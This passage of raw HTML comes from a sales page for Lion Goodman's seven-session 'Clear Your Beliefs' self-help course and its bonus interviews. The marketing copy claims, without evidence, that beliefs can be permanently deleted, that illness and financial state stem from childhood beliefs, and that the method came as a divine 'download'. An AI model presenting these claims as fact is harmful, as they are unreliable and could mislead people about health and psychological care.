the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- 